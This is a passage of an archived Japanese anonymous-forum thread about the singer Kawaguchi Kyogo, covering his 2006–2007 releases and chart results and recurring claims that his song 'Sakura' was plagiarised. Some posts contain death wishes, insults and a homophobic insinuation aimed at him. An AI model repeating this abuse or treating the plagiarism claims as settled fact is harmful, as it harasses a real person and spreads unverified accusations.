所詮「桜」はパクりだったから、オリで作ろうとしたらしょぼくて軽い曲ばっか。
ジョージアのCMで渡が「あの歌には深みがない」って歌、あれこそ河口の新曲だろ。

321 :NO MUSIC NO NAME:2006/09/07(木) 11:43:06 ID:+C5Fhxel
会社をやめてのカップリングの曲って微妙だった

322 :NO MUSIC NO NAME:2006/09/09(土) 20:02:26 ID:EVAScMaV
群青が(・∀・)イイヨイイヨー

323 :[sape]:2006/09/13(水) 11:20:02 ID:YYD/8CnX
髭。

324 :NO MUSIC NO NAME:2006/09/16(土) 04:17:03 ID:KsIIKqtA
この人、作詞作曲できるのが救いだね。
前作の「ホントの気持ち」はまだ良かったが、
「会社を辞めて旅に出よう」は開いた口が塞がらないよ…w
よく有線で流れるけど、会社を辞めて旅に出ようって…
舐めてんですかwww

325 :NO MUSIC NO NAME:2006/09/24(日) 11:49:06 ID:k/7l4p8X
河口恭吾は売れるような曲じゃないけど、雰囲気が好き。
歌も個性があって好き。前に下手って書いてたけど下手じゃないでしょ。


326 :NO MUSIC NO NAME:2006/09/24(日) 11:55:28 ID:1HYj2VL3
徳永のパクリ、サンプリングでしょ

327 :NO MUSIC NO NAME:2006/10/01(日) 01:44:54 ID:cjmsckaZ
Happy birthday! dear 河口恭吾

328 :NO MUSIC NO NAME:2006/10/02(月) 14:15:50 ID:q20rS1hr
フリーターニートが蔓延してる世で、よくこんなクズ歌出せるよな
無責任なクズ歌手
旅は休んでいくもの さすがバカアーティスト

329 :NO MUSIC NO NAME:2006/10/02(月) 14:24:51 ID:uwEBfp3J
いっくん>河口

330 :NO MUSIC NO NAME:2006/10/07(土) 21:27:34 ID:M1flDNvJ
僕のパクる道 河口恭吾

331 :NO MUSIC NO NAME:2006/10/08(日) 20:44:45 ID:maaIfIru
名前:みっけた[apfes] 投稿日:2006/10/08(日) 20:04:15 ID:maaIfIru
http://www2.axfc.net/uploader/2/so/N2_0534.avi.html


332 :8日:2006/10/10(火) 00:45:37 ID:3vMkly9z
“日本代表”河口恭吾4ヵ国ライブ競演「ASIAN BEAT MUSIC ALIVE 2006」age

333 :NO MUSIC NO NAME:2006/10/10(火) 00:46:47 ID:3vMkly9z
333げっとしていきますね。。。

334 :NO MUSIC NO NAME:2006/10/11(水) 12:08:41 ID:2CM+MbKj
>320
同感

335 :NO MUSIC NO NAME:2006/10/11(水) 12:12:06 ID:PmRUSK+t
普通に生きてゆく事は意外と難しい
2006/10/25 Release
CRCP-40160
\3,000(tax in)

01.会社をやめて旅に出よう
02.孤独のキャラバン
03.少し疲れてるだけさ
04.ホントは幸せ(Album version)
05.蒼い時計
06.答え
07.地球兄弟
08.ワタシnoツバサ
09.雨
10.普通に生きてゆく事は意外と難しい
11.逃げるが勝ち

336 :NO MUSIC NO NAME:2006/10/20(金) 10:59:17 ID:tLvJdcAm
やっぱり「僕のそばに」ににてるよな
歌詞もだし、ここまでパクるとすがすがしい

337 :NO MUSIC NO NAME:2006/10/21(土) 02:39:29 ID:M2uOAj2Y
この人てCHEMISTRYの月夜を作曲した人?セルフカバーとかしてる?

338 :NO MUSIC NO NAME:2006/10/21(土) 02:56:46 ID:UOXxGHoX
本当は槇原以上に世間から断罪されなければならないのはこいつなんだ。
そっこーBBS閉めて耳を塞いだ姿には笑えたなw

339 :NO MUSIC NO NAME:2006/10/25(水) 12:27:36 ID:Q0VPn+k3
コイツってあっち方面の感じがする
槙原同様にホモなのか?

340 :NO MUSIC NO NAME:2006/10/25(水) 20:07:16 ID:hWxyIHkM
テレビ出演情報
11月1日(水) グータンヌーボ 午後11:15〜11:45
スタジオゲストに河口恭吾。俺のDVDレコーダーのEPGに出ていた。

341 :NO MUSIC NO NAME:2006/10/26(木) 19:47:26 ID:hiVKY5zx
河口氏ね!

342 :NO MUSIC NO NAME:2006/10/26(木) 23:23:10 ID:YDbM3ZHR
おまえ下手やのに何でおまえが有名やねん。おかしいやろ。プロデューサーに金でも握らせてんのか、絶対おかしいわ。

343 :NO MUSIC NO NAME:2006/10/26(木) 23:26:41 ID:YDbM3ZHR
会社を辞めてやと、おまえ社員で働いた事あるんか、サルが!何適当につくっとんねん。俺が辞めるからおまえ働けや、恭吾、カス

344 :NO MUSIC NO NAME:2006/11/05(日) 04:29:20 ID:b6QZCe3J
三流のくせに何いきっとんねん。インディーズいけ。誰やアマチュア歌手をメジャーにしたのは金積んでんのんみえみえやないか。

345 :NO MUSIC NO NAME:2006/11/05(日) 04:33:38 ID:b6QZCe3J
お前な、歌の才能ないんやからサラリーマンして親に孝行したれ。まだ年的に再就職できるから、消えておらん様になるまえに働けって。悪いこといわんから。

346 :NO MUSIC NO NAME:2006/11/05(日) 05:03:07 ID:b6QZCe3J
だいたい桜が売れた事自体いまだにおかしい思てるのに。

347 :NO MUSIC NO NAME:2006/11/05(日) 09:59:45 ID:nSTD1V+q
なんとなく
メロディーぱくった
『さくら』です

気が付けば
歌詞まで似ていた
『さくら』です

森山くん
君がいたから
売れたのよ

ぱくりでも
売れてしまった
仕方がない



348 :NO MUSIC NO NAME:2006/11/05(日) 10:07:44 ID:5IJxfiFA
>>335
はぁ・・・なんだかな〜(・∀・)イイヨイイヨー

349 :NO MUSIC NO NAME:2006/11/05(日) 13:20:22 ID:2SzVzmJP
>>335みたいな糞アルバム
よくレコード会社が許可したよな?

350 :NO MUSIC NO NAME:2006/11/05(日) 13:30:39 ID:b6QZCe3J
金もらう事しか考えてないからこんな事になるんだよ。

351 :NO MUSIC NO NAME:2006/11/05(日) 13:53:18 ID:2SzVzmJP
で、>>335のアルバムは何位よ?
発売されてたことを今知ったがw

352 :NO MUSIC NO NAME:2006/11/06(月) 19:47:26 ID:fZgI6Pxj
まだ生きてたのか。死ねばいいのに。

353 :NO MUSIC NO NAME:2006/11/06(月) 21:28:30 ID:bG27w7Y0
ヘタクソやのに歌手になったからややこしなんねん。おとなしくサラリーマンしろ。これマジ話やで。冗談ちゃうで。。

354 :NO MUSIC NO NAME:2006/11/07(火) 09:45:10 ID:I5HNFFhS
新アルバムの売り上げを発表します。オリコン131位、1200枚。

355 :NO MUSIC NO NAME:2006/11/07(火) 10:50:09 ID:6C0HKoDJ
関西弁チックなレスいっぱいしてるアンチって・・・個人的にすげー恨みがあるんじゃねーの?w・・・

356 :NO MUSIC NO NAME:2006/11/08(水) 15:58:19 ID:7vKzmA0O
とても紅白に出場したとは思えない落ち目っぷり。
ギターを捨てて職安に行こう!

357 :NO MUSIC NO NAME:2006/11/08(水) 17:01:02 ID:m4KP0gyZ
とりあえず髭剃れ

358 :NO MUSIC NO NAME:2006/11/09(木) 17:05:02 ID:ac5CEjnx
>>351
最高位131位
ttp://www.oricon.co.jp/music/release/d/671376/1/

359 :NO MUSIC NO NAME:2006/11/13(月) 12:39:45 ID:qUa81lWR
俺は歌手になる人かそうじゃないか、自分の歌録音したのを後で聞いたら分かるやろ。それが上手いと思うなら君の耳は相当おかしい。

360 :NO MUSIC NO NAME:2006/11/13(月) 12:45:31 ID:qUa81lWR
インディーなら音が悪いからまあ、しゃーないんかなと思うけどメジャーのきちんとした音源で出してるのにこれはあかんやろ。レコード会社もはずかしくないのか?

361 :NO MUSIC NO NAME:2006/11/13(月) 20:43:00 ID:b6ri63cL
こいつが歌うなら俺が歌った方が聞けるぜ
いや、マジだから聞いてみろwww

362 :NO MUSIC NO NAME:2006/11/14(火) 03:47:19 ID:IGbCHjJG
河口がなぜ出てきたのか今だに意味がわからん。

363 :NO MUSIC NO NAME:2006/11/15(水) 21:15:52 ID:zFzuiksr
関西弁?の方、何も怒ること無いじゃん。自分の生活に関係ないなら関わんなきゃいいんじゃないの?

364 :NO MUSIC NO NAME:2006/11/16(木) 07:25:36 ID:vKVYPLEh
河口の中古CDの価格が10円だった

365 :NO MUSIC NO NAME:2006/11/17(金) 02:36:59 ID:WCqSAAxX
ただでもいらんわ。

366 :NO MUSIC NO NAME:2006/11/17(金) 20:48:46 ID:ygra1XXn
レンタル屋で河口のCDを、誰も借りそうにないコーナーに追いやってやった

367 :NO MUSIC NO NAME:2006/11/25(土) 12:23:02 ID:RyAerfMA
最近こいつのライブ見に行ったことある人いる?
客の入りが激しく気になる。

368 :NO MUSIC NO NAME:2006/11/27(月) 20:25:43 ID:YDTCh/jO
両A面シングル 2006.12.27 緊急発売決定!!
『景〜hikari〜/君に伝えられなくて (仮)』
河口恭吾

M-1.景〜hikari〜
    フジテレビ系全国ネット 土曜プレミアム
    硫黄島もうひとつの感動ストーリー
    「戦場の郵便配達」エンディング・テーマ

M-2.君に伝えられなくて (仮)
    ロッテ「レディーボーデン」TV-CMソング


売れないのにまた出してくれる日本クラウンはえらいな
感謝しろ恭吾

369 :NO MUSIC NO NAME:2006/11/27(月) 22:03:54 ID:5csKc7qU
多分ね、世界中の誰もが関西弁のアンチのお前より河口恭吾の方が人間としても全てにおいて立派だしかっこいいと言うと思うよ。

お前みたいな奴が子供相手に犯罪するんだろうね。


370 :NO MUSIC NO NAME:2006/11/28(火) 16:32:04 ID:J5YyCekz
>>暴言吐いている関西人
オマエ、振られた女が河口のファンだったんだろ?w
それで逆恨み。器の小さい男だね〜!

371 :NO MUSIC NO NAME:2006/11/29(水) 23:32:33 ID:G/+vQiDg
一昨日の渋谷のライブで河口氏を拝見しました。
テレビで見たときよりも歌うまいと思いました。
あんまりヒットチャートとは縁がなさそうな人だな、とも思いました。良い意味で。
細々と、売れすぎず売れなさすぎず、の位置で頑張ってほしいです。

372 :NO MUSIC NO NAME:2006/12/02(土) 19:21:05 ID:aFKpICtH
素人シンガー河口

373 :NO MUSIC NO NAME:2006/12/03(日) 13:12:38 ID:IZZmek7x
ここのスレの奴らよっぽど人生がつまんないんだな


374 :NO MUSIC NO NAME:2006/12/03(日) 23:35:23 ID:K4rjx67E
広島のコンサートから帰還

モミマン連呼ワラタ

375 :NO MUSIC NO NAME:2006/12/04(月) 05:42:46 ID:4OOp0dm2
ゆーじん見て、性格悪い人だなと思ったけど、みんな気付いてたのねw

376 :NO MUSIC NO NAME:2006/12/06(水) 03:06:43 ID:aejl2gEW
桜でブレイクしてた頃、過去のCDがヤフオクで物凄い高値で取引されてたのが懐かしいよな・・・。

377 :NO MUSIC NO NAME:2006/12/06(水) 22:05:19 ID:v/H4/uvf
>>368
槇原の映画主題歌
「光〜あなたを忘れない」に似てるな

378 :NO MUSIC NO NAME:2006/12/12(火) 13:25:29 ID:EmE414k+
もう終わったね。

379 :NO MUSIC NO NAME:2006/12/12(火) 19:27:47 ID:tmDmA6y2
河口死ねばいいのに

380 :NO MUSIC NO NAME:2006/12/14(木) 01:46:03 ID:dMaFoopp
河口は終わりだな。基本的に下手だから通用しない。

381 :NO MUSIC NO NAME:2006/12/18(月) 00:39:29 ID:lew6QCa1
もう消えてるじゃん

382 :NO MUSIC NO NAME:2006/12/23(土) 15:47:12 ID:5xU2k+7r
30過ぎたら再就職も困るな

383 :NO MUSIC NO NAME:2006/12/25(月) 02:04:46 ID:dJrTBN9o
>>335
なんかネーミングセンスが直太郎と似てる気がする
直太郎にもこういう長ったらしいタイトルのアルバムあった気が

384 :NO MUSIC NO NAME:2006/12/27(水) 19:27:23 ID:g+laQIF1
発売日なのでageておくか
まぁ、買ってないんだがな

385 :NO MUSIC NO NAME:2006/12/27(水) 22:09:06 ID:v1dODKQ+
発売日だったのか…

386 :NO MUSIC NO NAME:2006/12/31(日) 05:34:08 ID:hLJZcW+T
たか!!!
http://www.amazon.co.jp/gp/offer-listing/B00005HQDP/sr=1-20/qid=1167510806/ref=sr_1_20/250-7440425-9773012?ie=UTF8&s=music

387 :NO MUSIC NO NAME:2006/12/31(日) 11:42:04 ID:xkcJr9Fw
そろそろライブDVD出してほしいね。

388 :NO MUSIC NO NAME:2006/12/31(日) 17:54:23 ID:iI8LglmP
PV集も出してほしい
つーかもう出ないよね多分
singlesの初回DVDはPV集にすればよかったのにボニピンみたいに

389 :河口サイコーっ!:2006/12/31(日) 20:50:13 ID:DUEFaF9f
でも なんだかんだいって 顔がいいから O,K,だと思う!
あの整った顔だちは ほかの人には 真似できないと思う・・・

でも「会社をやめて・・・」とか「普通に生きてゆく事は・・・」
の曲のタイトルを見たときは「あれっ?」と思ったけどね。

390 : 【豚】 【1666円】 :2007/01/01(月) 00:52:28 ID:4WVIS5dN
ttp://www.yumebanchi.com/2007newyear/kawaguchi.htm

391 :NO MUSIC NO NAME:2007/01/01(月) 08:38:50 ID:FDGa5P8i
河口さんは顔が良いので、誰の曲をパクっても許してあげられそう。

392 :NO MUSIC NO NAME:2007/01/02(火) 13:02:50 ID:LXcZPjG0
コイツ最低!!!!!!!シネ!!!!!!

393 :NO MUSIC NO NAME:2007/01/03(水) 17:06:38 ID:cLdOFzhu
最近ヒットしないのは
元ネタを作るアーティストが力不足なだけで、
河口が悪いのではない。

394 :NO MUSIC NO NAME:2007/01/03(水) 19:13:31 ID:yCE6rNkr
>>391
氏ね!パクるやつなんて最低だ

395 :NO MUSIC NO NAME:2007/01/03(水) 19:41:38 ID:YA7MKZVZ
age


396 :NO MUSIC NO NAME:2007/01/03(水) 19:56:58 ID:/r8UPXLB
徳永英明が人気出てきたから河口は確実に終わりだし、例のパクリ曲がまた疑われるんじゃね?


397 :NO MUSIC NO NAME:2007/01/03(水) 20:11:52 ID:wjt7qz/7
お前ら、ほんと河口が好きなのな

398 :NO MUSIC NO NAME:2007/01/04(木) 02:17:07 ID:fv5NDWK1
テレ東の番組で桜はこうやって生まれたとか地元歩いて語ってる映像みて最悪な気分になりました。
パクリのくせしてよくここまでやるなって飽きれました

399 :NO MUSIC NO NAME:2007/01/04(木) 02:57:42 ID:igVjTR7E
あのー、桜は僕そばのパクりだって河口さんは認めたの?
桜ってまだCDあるの?
詳しい事知らないから昔の事だけど教えてください
まぁ似過ぎててびっくりしました

400 :NO MUSIC NO NAME:2007/01/04(木) 17:08:55 ID:Oq+RAc2F
「笑っていいとも!」にまで出やがって。こいつには良心ってものはないのか?

401 :NO MUSIC NO NAME:2007/01/05(金) 14:03:06 ID:ijNqZ3dG
両親はいますよ

402 :NO MUSIC NO NAME:2007/01/07(日) 08:45:33 ID:fhXEBoa6
>>401
河口本人?

403 :NO MUSIC NO NAME:2007/01/11(木) 16:20:25 ID:c33A0oiR
確かに河口恭吾最近ぱっとしないね。1st、2stアルバムは今だにヘビロテしてるけど最新アルバムはダメだった。正直ショックだった。ファン辞めようと思ってしまった。
ワタシnoツバサは良かったけど。逃げるが勝ち、とか笑えんほどひどい。
新しいシングルも一曲目と二曲目サビ似過ぎだし、アレンジもいまいちだった。
小田和正の方が好き。

404 :NO MUSIC NO NAME:2007/01/14(日) 05:32:16 ID:MIyWEXOm
ttp://www.sanspo.com/geino/top/gt200701/gt2007011406.html

最近見てなかったけどこの髪型はどうだろう

405 :NO MUSIC NO NAME:2007/01/14(日) 13:04:33 ID:4ByJ6Rgl
>ララポートの1000人の前で新曲を披露(14日・日刊スポーツ)
全員買い物客じゃね?

406 :NO MUSIC NO NAME:2007/01/15(月) 21:17:17 ID:G2a12Xae
なんだかんだ言ってやっぱり好きな俺がいる。アスナロって名曲よね〜。

407 :NO MUSIC NO NAME:2007/01/19(金) 17:55:49 ID:iViwr36s
アスナロもパクッてるの?

408 :NO MUSIC NO NAME:2007/01/20(土) 10:51:39 ID:MYwF3k/v
アスナロは知らんけど結局問題なのは意図的にパクったかどうかやない?桜は意図的とは思うけどJASRACにかからんかった訳やしごたごた言う奴は聞かんどきゃいいんよ。



409 :NO MUSIC NO NAME:2007/01/21(日) 14:14:05 ID:dLZsQcF2
いや、パクリを認めるまでごたごた言うぞ。

410 :NO MUSIC NO NAME:2007/01/21(日) 18:59:00 ID:IOuvJwod
へたくそだな。こいつを見いだした奴の耳どんなんか覗いてやりたいよ。

411 :NO MUSIC NO NAME:2007/01/21(日) 20:19:49 ID:jbwNGNG6
下手くそって言う奴がよう分からん。
プロの世界で特別歌うまいとは思わんけど、
プロに通用するうまさと個性はあるよ。で河口恭吾はあくまでシンガーソングライターで
歌だけじゃなく作詞作曲、楽曲提供、ギター、ピアノまでするアーティストってこと。例えばEXILE。
あの二人は歌うまいけど歌うだけであくまで歌手。
ビブラートかける奴がうまいとか思っとるか?
ビブラートはかけれるけどかけん人の方が今の時代は多いし。
素人は勉強してから批判しろ。


412 :NO MUSIC NO NAME:2007/01/24(水) 18:03:47 ID:si/fcCcn
これ、2年前にスレが立ったのに未だにあるのか・・・w
批判するやつも居なくなると本当に終わりだな河口さんよ

413 :NO MUSIC NO NAME:2007/01/30(火) 13:13:42 ID:TDv8Nxm+
4/18 シングル

414 :NO MUSIC NO NAME:2007/01/30(火) 16:26:47 ID:dPtSTDIQ
パクりじゃない曲ヒットさせればこんなに干される事なかったのにな。ただ新曲はタイアップ効果か久しぶりチャートイン3週してるね

415 :NO MUSIC NO NAME:2007/01/31(水) 20:57:18 ID:mcpnz9up
チャートインて何位に?早くツアーしてほしいな。
あとDVD出さんかな?
前WOWであったライブ見逃した。

416 :NO MUSIC NO NAME:2007/02/01(木) 09:50:35 ID:e7rP0Gu2
4/18 シングル  C/W CM:さくら不動産TV-CMソング


3/07 本多ルルが桜、地球兄弟をカバー(地球兄弟は恭吾とのコラボ)(AL「初心」に収録)
3/21 キンモクセイが桜をカバー(AL「さくら」に収録)

417 :NO MUSIC NO NAME:2007/02/08(木) 18:22:45 ID:T9oFsQmH
ぱくり不動産?

418 :NO MUSIC NO NAME:2007/02/08(木) 21:46:17 ID:zGY/0ZuO
一回パクったからって、何回もパクリパクリ言うなよ。
B'zみたいに何回もパクリを繰り返しているヤツらとは違う。

419 :NO MUSIC NO NAME:2007/02/09(金) 14:48:44 ID:AGqD4WS7
少量ずつパクってるのなら可愛いもんだが、あれだけそっくりに堂々とパクって


420 :NO MUSIC NO NAME:2007/02/09(金) 20:57:45 ID:i18nWtGT
あれはパクリの領域を遥かに越えて、もはやコピペに近い。

421 :NO MUSIC NO NAME:2007/02/10(土) 15:03:02 ID:yj9GUAx7
嘘!?
あれは徳永さんの曲のカバ〜じゃないの?


422 :NO MUSIC NO NAME:2007/02/12(月) 20:16:07 ID:dfHXzjtV
量ではB'zには到底およばないが、質では誰も寄せ付けない歴史的高レベルなパクリ

423 :NO MUSIC NO NAME:2007/02/12(月) 21:55:40 ID:wVe5+iis
【ウリジナル】市名をパクった盗作市が、パクリ大魔王の河口恭吾にオリジナル市歌依頼 【さくら市】
http://news23.2ch.net/test/read.cgi/news/1171283934/

1 :依頼@266:2007/02/12(月) 21:38:54 ID:DB1v+evG0 ?S★(146950)
http://www.shimotsuke.co.jp/hensyu/news/php/s_news.php?f=k&d=20070209&n=12

さくら市の歌を河口恭吾さんに依頼(2/9)

 【さくら】若者に歌ってもらえ、全国に発進できる歌を−。
市の歌制定委員会(会長・秋元喜平市長、二十五人)はこのほど、
市の歌の作成について、シンガー・ソングライターの河口恭吾さん
(32)と正式契約した。

2 :番組の途中ですが名無しです :2007/02/12(月) 21:39:23 ID:8N82eTXn0
なに言ってんのかさっぱりわからない

3 :番組の途中ですが名無しです :2007/02/12(月) 21:41:50 ID:GBF+BpBq0
パクリマ・クリシティー

4 :番組の途中ですが名無しです :2007/02/12(月) 21:43:03 ID:vGmpV61l0
河口恭吾氏「桜」疑惑まとめサイト
http://www.geocities.jp/he_was_born/
「桜」パクリ検証フラッシュ
http://www.geocities.jp/he_was_born/sakura.swf
河口恭吾「アスナロ(桜のカップリング)」 &ZARD「マイフレンド」
http://www.geocities.jp/he_was_born/as.mp3

424 :NO MUSIC NO NAME:2007/02/14(水) 22:42:40 ID:o5JEzvnT
河口恭吾が出したアルバム「ILOVEYOU」のジャケットが徳永英明の「ラブバラードセレクション2?」のジャケットとそっくり!しかも発売日も同じ!?何かあるんかな??

425 :NO MUSIC NO NAME:2007/02/14(水) 23:12:58 ID:057XtPPL
実は相思相愛

426 :NO MUSIC NO NAME:2007/02/23(金) 11:11:51 ID:uTeoJ8zv
河口恭吾の地声に魅かれた

75 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)